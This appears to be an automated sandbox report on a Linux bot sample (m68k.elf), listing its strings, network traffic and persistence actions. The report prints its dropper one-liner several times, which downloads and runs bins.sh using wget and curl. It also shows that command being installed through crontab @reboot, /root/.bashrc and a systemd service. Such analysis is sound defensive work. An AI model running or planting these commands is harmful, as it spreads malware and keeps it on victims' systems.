Source: m68k.elf |
ReversingLabs: Detection: 28% |
Source: m68k.elf |
String: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogm68k->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd |
Source: m68k.elf |
String: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh" |
Source: m68k.elf |
String: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrc |
Source: .bashrc.13.dr |
String: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh" |
Source: bot.service.13.dr |
String: ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh" |
Source: global traffic |
TCP traffic: 192.168.2.23:42134 -> 8.8.8.8:53 |
Source: global traffic |
TCP traffic: 192.168.2.23:42124 -> 8.8.8.8:53 |
Source: global traffic |
TCP traffic: 192.168.2.23:42130 -> 8.8.8.8:53 |
Source: global traffic |
TCP traffic: 192.168.2.23:42132 -> 8.8.8.8:53 |
Source: /bin/curl (PID: 6245) |
Reads hosts file: /etc/hosts |
Jump to behavior |
Source: /tmp/m68k.elf (PID: 6224) |
Socket: 127.0.0.1:4161 |
Jump to behavior |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 109.202.202.202 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 34.249.145.219 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 34.249.145.219 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 34.249.145.219 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 109.202.202.202 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 34.249.145.219 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
DNS traffic detected: DNS query: cdn.fwupd.org |
Source: global traffic |
DNS traffic detected: DNS query: host.zopz-api.com |
Source: tmp.aHD8f7.22.dr |
String found in binary or memory: http://serverip/bins/bins.sh |
Source: bot.service.13.dr |
String found in binary or memory: http://serverip/bins/bins.sh; |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 39282 |
Source: unknown |
Network traffic detected: HTTP traffic on port 43928 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 39282 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 42836 -> 443 |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox |
Source: Initial sample |
String containing 'busybox' found: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogm68k->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd |
Source: ELF static info symbol of initial sample |
.symtab present: no |
Source: classification engine |
Classification label: mal60.troj.linELF@0/4@25/0 |
Source: /bin/sh (PID: 6242) |
Crontab executable: /usr/bin/crontab -> crontab -l |
Jump to behavior |
Source: /bin/sh (PID: 6241) |
Crontab executable: /usr/bin/crontab -> crontab - |
Jump to behavior |
Source: /tmp/m68k.elf (PID: 6226) |
File written: /root/.bashrc |
Jump to behavior |
Source: /usr/bin/crontab (PID: 6241) |
File: /var/spool/cron/crontabs/tmp.aHD8f7 |
Jump to behavior |
Source: /usr/bin/crontab (PID: 6241) |
File: /var/spool/cron/crontabs/root |
Jump to behavior |
Source: /tmp/m68k.elf (PID: 6226) |
File: /root/.bashrc |
Jump to behavior |
Source: /bin/curl (PID: 6245) |
Directory: /root/.curlrc |
Jump to behavior |
Source: /tmp/m68k.elf (PID: 6234) |
Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -" |
Jump to behavior |
Source: /tmp/m68k.elf (PID: 6250) |
Shell command executed: sh -c "/bin/systemctl enable bot" |
Jump to behavior |
Source: /bin/sh (PID: 6243) |
Chmod executable: /usr/bin/chmod -> chmod +x bins.sh |
Jump to behavior |
Source: /bin/sh (PID: 6249) |
Chmod executable: /usr/bin/chmod -> chmod +x bins.sh |
Jump to behavior |
Source: /usr/bin/dash (PID: 6331) |
Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsb |
Jump to behavior |
Source: /usr/bin/dash (PID: 6332) |
Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsb |
Jump to behavior |
Source: /bin/sh (PID: 6254) |
Systemctl executable: /bin/systemctl -> /bin/systemctl enable bot |
Jump to behavior |
Source: /tmp/m68k.elf (PID: 6224) |
Queries kernel information via 'uname': |
Jump to behavior |
Source: /bin/curl (PID: 6245) |
Queries kernel information via 'uname': |
Jump to behavior |
Source: m68k.elf, 6224.1.000055c186832000.000055c1868df000.rw-.sdmp, m68k.elf, 6226.1.000055c186832000.000055c1868df000.rw-.sdmp |
Binary or memory string: U!/etc/qemu-binfmt/m68k |
Source: m68k.elf, 6224.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp, m68k.elf, 6226.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp |
Binary or memory string: /usr/bin/qemu-m68k |
Source: m68k.elf, 6224.1.000055c186832000.000055c1868df000.rw-.sdmp, m68k.elf, 6226.1.000055c186832000.000055c1868df000.rw-.sdmp |
Binary or memory string: /etc/qemu-binfmt/m68k |
Source: m68k.elf, 6226.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp |
Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped |
Source: m68k.elf, 6224.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp, m68k.elf, 6226.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp |
Binary or memory string: x86_64/usr/bin/qemu-m68k/tmp/m68k.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/m68k.elf |